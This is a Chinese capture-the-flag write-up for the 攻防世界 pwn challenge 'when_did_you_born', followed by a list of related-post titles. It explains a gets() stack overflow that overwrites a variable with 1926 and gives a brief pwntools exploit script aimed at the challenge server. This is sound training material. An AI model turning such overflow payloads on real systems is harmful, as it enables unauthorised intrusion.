[攻防世界 pwn]——when_did_you_born

  • 题目地址: https://adworld.xctf.org.cn/
  • 题目:

    checksec看下 64位

    IDA中,只要v5最初不是1926,之后改为1926就可以了。利用gets栈溢出就好v4与v5相差0x20 -0x18

exploit

from pwn import *
#p = process("./pwn")
p = remote("111.200.241.244",58101)
p.sendlineafter("What's Your Birth?\n", '2001')
payload = 'a' * 8 + p64(0x786)
p.sendlineafter("What's Your Name?", payload)
p.interactive()

[攻防世界 pwn]——when_did_you_born相关推荐

  1. 攻防世界(Pwn) forgot---栈溢出;(方法二)

    攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...

  2. 攻防世界(Pwn) forgot---栈溢出;(方法一)

    攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...

  3. [攻防世界 pwn]——pwn1(内涵peak小知识)

    [攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...

  4. [攻防世界 pwn]——实时数据监测

    [攻防世界 pwn]--实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746 ...

  5. [攻防世界 pwn]——monkey

    [攻防世界 pwn]--monkey 题目地址:https://adworld.xctf.org.cn/ 题目: 额,怎么说呢这道题.checksec没什么大不了的 但是再IDA中就懵了,好大呀.好多 ...

  6. [攻防世界 pwn]——反应釜开关控制

    [攻防世界 pwn]--反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit ...

  7. [攻防世界 pwn]——pwn-100

    [攻防世界 pwn]--pwn-100 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下 IDA中 sub_40063D函数的作用就是读入200个字符 ...

  8. [攻防世界 pwn]——pwn-200

    [攻防世界 pwn]--pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一 ...

  9. [攻防世界 pwn]——welpwn

    [攻防世界 pwn]--welpwn 题目地址: https://adworld.xctf.org.cn/ 题目: 我只能说这道题太巧了, 实在太巧了.我想出来一个名词叫做栈连接 还是先checkse ...

最新文章

  1. H5 客户端设置title 滑动验证码
  2. Transformer在CV领域有可能替代CNN吗?还有哪些应用前景?
  3. stackoverflow提问网站(why prefer generator to list)
  4. MySQL 5.7 并行复制实现原理与调优
  5. Java 8中处理集合的优雅姿势——Stream
  6. sdut 2088 数据结构实验之栈与队列十一:refresh的停车场
  7. Weex-初次见到你
  8. [攻防世界 pwn]——time_formatter(内涵peak小知识)
  9. Maven硒测试自动化教程
  10. 工作308:控制change
  11. NB-IoT(7)---开发环境搭建及模组驱动开发
  12. 利用WPS 2013文字制作精美的信纸的方法
  13. 雨敲窗python_今夜,有雨敲窗(太美了)
  14. Python的包(Packages)
  15. Spring源码之ApplicationContext(九)初始化剩余的单例
  16. 从零开始搭建一个K8S的环境
  17. C语言嵌入式系统编程修炼之道
  18. signature=de4fefc549f99f0b0c76a2cec8e340bf,Diagnostics based on faulty signature
  19. 网络工程师【软考】02
  20. 沟通的艺术III:看人之间 之人际关系

热门文章

  1. 网络安全-windows批处理
  2. linux使用权限模式启动mongodb,Linux安装MongoDB启动及常见问题解决
  3. php 覆盖写文件内容,php写入文件不覆盖的实例讲解
  4. MFC VS2012对话框背景填图
  5. 【数据结构与算法】之深入解析“正则表达式匹配”的求解思路与算法示例
  6. HarmonyOS之将SVG文件转换为XML文件
  7. iOS之CocoaPods二进制化的实现方案
  8. 13.2.4 模板层——模板语言
  9. 2018年第九届蓝桥杯C/C++ C组国赛 —— 第一题:年龄问题
  10. 2019第十届蓝桥杯C/C++ B组省赛 —— 第二题:年号字串